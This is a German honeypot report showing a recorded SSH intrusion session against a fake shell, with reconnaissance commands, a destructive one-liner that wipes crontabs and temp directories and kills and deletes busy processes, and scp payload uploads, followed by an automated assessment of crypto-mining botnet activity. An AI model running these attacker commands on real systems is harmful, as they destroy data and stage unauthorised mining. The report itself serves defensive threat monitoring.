ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Niederlande: Schadcode nachladen und Einnisten per Cronjob

09.10.2026, 06:20 UTC · 85 Befehle · über ssh · Niederlande

Überblick

Dienst
ssh (Port 22)
Herkunft
Niederlande · TechTies Inc.
Probierte Zugangsdaten
guies / Admin

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
guies@srv01: ~

guies@srv01:~$ uname -s -v -n -r -m
Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64
guies@srv01:~$ uname -m | awk '{printf $1}'
x86_64
guies@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
up 6 days, 00:00:00
guies@srv01:~$ lspci | egrep VGA && lspci | grep 3D
0000:00:02.0 VGA compatible controller: Red Hat, Inc. Virtio GPU
guies@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
AMD EPYC 7302P 16-Core Processor
guies@srv01:~$ curl ipinfo.io/org
Cloudflare, Inc.
guies@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
bash: nvidia-smi: command not found
guies@srv01:~$ nvidia-smi -q | grep "Product Name"
bash: nvidia-smi: command not found
guies@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
guies@srv01:~$ uname -n | awk '{printf $1}'
proxy
guies@srv01:~$ uname -r | awk '{printf $1}'
5.10.0-23-amd64
guies@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
bash: cache: command not found
guies@srv01:~$ echo Admin > /tmp/d.log
guies@srv01:~$ scp -qt "/var/tmp/GziEQEkk"
guies@srv01:~$ scp -qt "/tmp/GziEQEkk"
guies@srv01:~$ uname -s -v -n -r -m
Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64
guies@srv01:~$ scp -qt "/dev/shm/GziEQEkk"
guies@srv01:~$ echo 123123 > /tmp/d.log
guies@srv01:~$ scp -qt "/var/tmp/CQXUTlms"
guies@srv01:~$ scp -qt "/tmp/CQXUTlms"
guies@srv01:~$ scp -qt "/dev/shm/CQXUTlms"
guies@srv01:~$ uname -s -v -n -r -m
Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64
guies@srv01:~$ echo admin > /tmp/d.log
guies@srv01:~$ scp -qt "/var/tmp/HEnAlfKf"
guies@srv01:~$ scp -qt "/tmp/HEnAlfKf"
guies@srv01:~$ scp -qt "/dev/shm/HEnAlfKf"
guies@srv01:~$ uname -s -v -n -r -m
Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64
guies@srv01:~$ echo mcserver > /tmp/d.log
guies@srv01:~$ scp -qt "/var/tmp/UsyDADaN"
guies@srv01:~$ scp -qt "/tmp/UsyDADaN"
guies@srv01:~$ scp -qt "/dev/shm/UsyDADaN"
guies@srv01:~$ uname -s -v -n -r -m
Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64
guies@srv01:~$ echo test1234 > /tmp/d.log
guies@srv01:~$ scp -qt "/var/tmp/yqvcAvjL"
guies@srv01:~$ scp -qt "/tmp/yqvcAvjL"
guies@srv01:~$ scp -qt "/dev/shm/yqvcAvjL"
guies@srv01:~$ uname -s -v -n -r -m
Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64
guies@srv01:~$ echo andreas > /tmp/d.log
guies@srv01:~$ scp -qt "/var/tmp/NPPrCvMX"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Ein Angreifer meldete sich mit schwachen Zugangsdaten über SSH an. Er führte eine Reihe von Systemabfragen durch, um Hardware, CPU und Netzwerkdetails zu ermitteln. Anschließend löschte er temporäre Dateien, beendete ressourcenintensive Prozesse und lud mehrere Dateien in verschiedene Systemverzeichnisse hoch.

Was die Befehle bewirken

Die Befehle uname, lspci und lscpu sammeln Informationen über das Betriebssystem, die Grafikkarte und den Prozessor. Der Aufruf von nvidia-smi prüft auf NVIDIA-GPUs, was für Mining relevant ist. Der komplexe Befehl mit crontab und ps löscht alte Cronjobs, räumt Temp-Verzeichnisse auf und beendet Prozesse, die mehr als 40 Prozent CPU oder 60 Prozent RAM nutzen. Die scp-Kommandos kopieren Dateien in Verzeichnisse wie /var/tmp und /dev/shm, um sie vor Entdeckung zu verstecken.

Worauf es hinauslief

Das Vorgehen deutet auf die Vorbereitung eines Kryptomining-Botnets hin. Die Abfrage nach Grafikkarten und die Löschung konkurrierender Prozesse sind typische Schritte, um Rechenkapazität freizumachen. Die hochgeladenen Dateien dienen vermutlich als Mining-Software oder Persistenz-Mechanismen.

Einordnung

Dieses Muster ist sehr verbreitet und folgt einem bekannten Skript für automatisierte Mining-Angriffe. Die Kombination aus Hardware-Scan, Prozess-Kill und Datei-Upload ist ein Standardverfahren für Botnet-Ausbreitung.